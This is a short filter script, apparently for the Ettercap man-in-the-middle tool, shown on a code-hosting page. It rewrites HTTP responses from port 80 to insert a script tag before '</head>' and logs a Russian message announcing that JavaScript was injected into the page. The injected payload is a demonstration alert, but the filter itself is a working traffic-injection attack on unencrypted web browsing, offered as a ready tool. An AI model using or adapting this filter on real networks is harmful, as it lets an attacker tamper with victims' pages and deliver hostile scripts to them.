Files

5 lines
160 B
JavaScript
Raw Permalink Normal View History

if (ip.proto == TCP && tcp.src == 80) {
replace("</head>", "<script>alert('XSS!')</script></head>");
msg("Внедрен JS в страницу!\n");
}